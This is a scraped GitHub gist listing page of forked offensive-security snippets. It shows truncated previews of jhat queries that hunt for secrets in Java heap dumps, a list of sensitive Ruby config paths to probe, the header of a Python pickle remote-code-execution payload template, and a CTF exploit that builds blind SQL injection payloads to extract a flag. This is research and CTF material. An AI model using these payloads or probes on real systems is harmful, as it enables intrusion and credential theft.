^[^.]+. - This Removes everything before the . and including the . so handy for a list of sub doamins.
websecresearch
websecresearch
/ jhat base searches
Created
January 29, 2020 13:41
— forked from random-robbie/jhat base searches
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| select {o: s,val:s.value.toString()} from java.lang.String s | |
| where | |
| /^[0-9A-Za-z!\\\/\"\?/+=;\&\(\)\[\]\.:-_@\'\#\*]{5,15}$/.test(s.value.toString()) | |
| select {o: s,val:s.value.toString()} from java.lang.String s | |
| where | |
| /^[0-9A-Za-z!\\\/\"\?/+=;\&\(\)\[\]\.:-_@\'\#\*]{19,31}$/.test(s.value.toString()) | |
| select {o: s,val:s.value.toString()} from java.lang.String s | |
| where |
websecresearch
/ textwrangler.md
Created
January 29, 2020 13:41
— forked from random-robbie/textwrangler.md
Text Wrangler Regex's
websecresearch
/ ruby-sensitive-files.txt
Created
January 29, 2020 13:41
— forked from random-robbie/ruby-sensitive-files.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| database.yml | |
| database.yml_original | |
| database.yml~ | |
| database.yml.pgsql | |
| database.yml.sqlite3 | |
| config/database.yml | |
| config/database.yml_original | |
| config/database.yml~ | |
| config/database.yml.pgsql | |
| config/database.yml.sqlite3 |
websecresearch
/ pickle-payload.py
Created
January 23, 2020 16:28
— forked from mgeeky/pickle-payload.py
Python's Pickle Remote Code Execution payload template.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Pickle deserialization RCE payload. | |
| # To be invoked with command to execute at it's first parameter. | |
| # Otherwise, the default one will be used. | |
| # | |
| import cPickle | |
| import sys | |
| import base64 |
websecresearch
/ exploit.js
Created
January 12, 2020 08:02
— forked from terjanq/exploit.js
This is a solution of Oracle v2 and Oracle v1 from https://nn9ed.ka0labs.org/challenges#x-oracle%20v2 (I realized I could use <meta> and redirect admin to my website and run the challenge in iframes after I already solved it with bruteforcing the admin :p)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const fetch = require('node-fetch'); | |
| var flag = 'nn9ed{' | |
| var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}' | |
| var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}'); | |
| var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect | |
| const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/' | |
| // Generates definitions for fonts | |
| function generateFonts() { |
NewerOlder